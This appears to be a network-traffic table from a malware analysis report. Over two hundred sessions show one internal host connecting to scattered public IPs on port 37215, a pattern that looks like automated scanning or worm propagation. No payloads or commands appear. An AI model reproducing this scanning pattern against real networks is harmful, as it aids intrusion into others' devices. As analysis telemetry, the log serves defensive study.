                                                  13479192.168.2.1346040137.111.13.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13480192.168.2.1349046157.11.205.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13481192.168.2.136062841.174.116.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13482192.168.2.133312469.64.118.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13483192.168.2.1335080157.207.4.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13484192.168.2.1342996183.173.168.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13485192.168.2.1342310197.157.86.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13486192.168.2.1334446122.202.125.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13487192.168.2.1343906164.243.51.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13488192.168.2.134002241.187.73.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13489192.168.2.1347642164.206.52.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13490192.168.2.1346368197.19.139.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13491192.168.2.1349480197.237.218.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13492192.168.2.1348964142.134.27.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13493192.168.2.136089039.206.176.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13494192.168.2.1351466197.62.164.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13495192.168.2.1350040157.233.30.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13496192.168.2.1348298157.26.48.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13497192.168.2.134222641.124.75.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13498192.168.2.1341754197.219.138.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13499192.168.2.1340780157.252.38.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13500192.168.2.1336396157.88.150.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13501192.168.2.1341184157.23.7.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13502192.168.2.134249692.248.20.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13503192.168.2.134479441.132.92.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13504192.168.2.134222641.138.206.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13505192.168.2.1333798157.184.231.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13506192.168.2.1360812157.238.176.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13507192.168.2.1335696100.42.4.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13508192.168.2.1338762157.228.254.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13509192.168.2.135626441.63.199.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13510192.168.2.1352276197.54.42.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13511192.168.2.1344018157.185.208.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13512192.168.2.1360240157.250.165.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13513192.168.2.1360526157.242.191.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13514192.168.2.1352862220.92.45.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13515192.168.2.1356608157.80.159.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13516192.168.2.1351312197.75.223.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13517192.168.2.1340728112.61.172.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13518192.168.2.135460041.185.54.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13519192.168.2.1349336157.51.51.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13520192.168.2.135006476.246.81.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13521192.168.2.1340664197.192.184.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13522192.168.2.1344430157.222.215.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13523192.168.2.134043041.13.57.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13524192.168.2.134827623.66.237.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13525192.168.2.133553641.7.193.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13526192.168.2.134051641.125.196.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13527192.168.2.1349944157.168.190.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13528192.168.2.1341502197.169.26.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13529192.168.2.1354460180.44.60.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13530192.168.2.1348016157.164.82.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13531192.168.2.1343422157.181.207.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13532192.168.2.1346082197.53.213.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13533192.168.2.1353066157.239.3.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13534192.168.2.1347238197.22.182.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13535192.168.2.1348348157.253.227.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13536192.168.2.1342566157.98.117.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13537192.168.2.1341384157.154.93.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13538192.168.2.135960241.201.184.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13539192.168.2.1356166197.151.117.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13540192.168.2.1344312157.152.204.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13541192.168.2.133949241.151.191.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13542192.168.2.1348496183.3.109.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13543192.168.2.134496841.75.92.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13544192.168.2.1337004112.82.183.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13545192.168.2.1344372157.34.125.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13546192.168.2.1345266197.87.217.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13547192.168.2.134893825.41.94.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13548192.168.2.134707241.208.162.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13549192.168.2.134334870.72.124.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13550192.168.2.1342198157.248.30.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13551192.168.2.1336856157.68.21.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13552192.168.2.135401641.148.60.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13553192.168.2.136002231.37.54.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13554192.168.2.134862441.78.169.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13555192.168.2.1355402157.57.56.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13556192.168.2.135923641.107.188.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13557192.168.2.1357436197.75.244.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13558192.168.2.1344730157.5.214.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13559192.168.2.1335594157.225.89.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13560192.168.2.1360426157.104.119.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13561192.168.2.1358588181.46.110.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13562192.168.2.1348000176.192.63.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13563192.168.2.1342944197.61.249.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13564192.168.2.1352356157.248.7.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13565192.168.2.1344282157.209.90.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13566192.168.2.1345236157.221.123.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13567192.168.2.134540841.2.218.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13568192.168.2.135597840.11.137.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13569192.168.2.1343138143.177.206.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13570192.168.2.134240813.245.129.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13571192.168.2.133535041.208.61.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13572192.168.2.1338752197.143.244.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13573192.168.2.1359438197.117.8.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13574192.168.2.1335836157.207.55.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13575192.168.2.1340640157.175.156.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13576192.168.2.1356916197.223.91.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13577192.168.2.1344042197.216.174.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13578192.168.2.1343268197.134.152.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13579192.168.2.1337358197.189.152.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13580192.168.2.1343690197.150.56.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13581192.168.2.1346976157.121.18.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13582192.168.2.134586641.161.163.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13583192.168.2.1335200209.199.244.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13584192.168.2.133991641.180.129.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13585192.168.2.134797841.187.243.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13586192.168.2.1342784197.75.139.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13587192.168.2.1353304157.55.145.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13588192.168.2.1351616157.185.146.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13589192.168.2.1358380157.145.106.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13590192.168.2.1354298179.243.37.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13591192.168.2.1337794157.113.88.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13592192.168.2.134249067.161.130.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13593192.168.2.134153241.10.57.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13594192.168.2.1352896157.162.22.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13595192.168.2.1360196157.215.182.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13596192.168.2.133870441.172.94.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13597192.168.2.13425485.148.38.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13598192.168.2.1359838157.205.14.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13599192.168.2.134843441.221.24.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13600192.168.2.135869043.168.59.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13601192.168.2.1340716138.15.246.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13602192.168.2.134364841.47.140.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13603192.168.2.1332864157.176.12.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13604192.168.2.1349236113.38.152.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13605192.168.2.1359308157.56.135.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13606192.168.2.1338654197.156.227.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13607192.168.2.1347568197.137.72.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13608192.168.2.1343922157.188.58.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13609192.168.2.134510041.46.75.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13610192.168.2.135646041.144.49.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13611192.168.2.1355442157.222.163.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13612192.168.2.134042813.119.69.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13613192.168.2.136003697.177.18.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13614192.168.2.134581841.60.100.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13615192.168.2.135722441.73.126.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13616192.168.2.134113241.40.175.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13617192.168.2.1359170197.212.124.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13618192.168.2.134346041.223.235.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13619192.168.2.1348252197.136.249.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13620192.168.2.1356090157.117.221.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13621192.168.2.1349796197.182.98.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13622192.168.2.1352054197.233.194.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13623192.168.2.135073834.15.113.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13624192.168.2.135137641.89.211.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13625192.168.2.1337484197.14.60.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13626192.168.2.135699036.4.86.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13627192.168.2.1343096157.109.195.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13628192.168.2.1352410165.135.248.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13629192.168.2.1353244197.113.78.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13630192.168.2.134444841.50.117.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13631192.168.2.1340706157.48.231.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13632192.168.2.1355316157.207.12.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13633192.168.2.1357644109.90.36.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13634192.168.2.1350300157.81.26.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13635192.168.2.1348406157.208.234.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13636192.168.2.1352790157.58.72.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13637192.168.2.1343220102.156.127.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13638192.168.2.135259041.135.207.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13639192.168.2.135765634.159.171.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13640192.168.2.1357458197.254.206.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13641192.168.2.1360364197.72.5.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13642192.168.2.134950441.220.177.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13643192.168.2.1352118157.98.127.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13644192.168.2.134828278.164.36.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13645192.168.2.1337522197.213.252.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13646192.168.2.1343280157.234.113.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13647192.168.2.1355692157.201.115.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13648192.168.2.1351184157.154.134.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13649192.168.2.1343682197.188.31.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13650192.168.2.134753241.72.191.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13651192.168.2.1360080138.210.53.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13652192.168.2.1345196157.207.196.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13653192.168.2.1341328198.143.185.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13654192.168.2.134905641.178.89.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13655192.168.2.1336176197.125.164.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13656192.168.2.1338268137.109.35.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13657192.168.2.1341302207.212.187.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13658192.168.2.1352462197.94.2.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13659192.168.2.133593441.195.70.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13660192.168.2.1339806157.31.99.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13661192.168.2.133610641.210.172.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13662192.168.2.135051641.42.0.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13663192.168.2.1348490157.175.214.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13664192.168.2.1353132157.158.240.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13665192.168.2.1348014197.204.203.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13666192.168.2.1339776197.190.11.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13667192.168.2.1342218157.80.158.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13668192.168.2.1334952157.252.175.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13669192.168.2.1352786222.237.86.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13670192.168.2.1338126199.99.244.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13671192.168.2.134585241.171.155.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13672192.168.2.134461290.52.139.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13673192.168.2.1345322191.167.57.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13674192.168.2.135396041.216.89.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13675192.168.2.1352548197.192.5.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13676192.168.2.1349516157.154.101.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13677192.168.2.1343996157.197.175.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13678192.168.2.1334828155.109.34.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13679192.168.2.1353008197.63.64.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13680192.168.2.1345628157.69.137.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13681192.168.2.1345258157.236.140.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13682192.168.2.134533269.139.59.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13683192.168.2.135823687.106.46.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13684192.168.2.1360578157.250.141.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13685192.168.2.1349858200.15.7.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13686192.168.2.1355096197.95.45.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13687192.168.2.1352574197.97.50.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13688192.168.2.1335122157.125.141.18237215
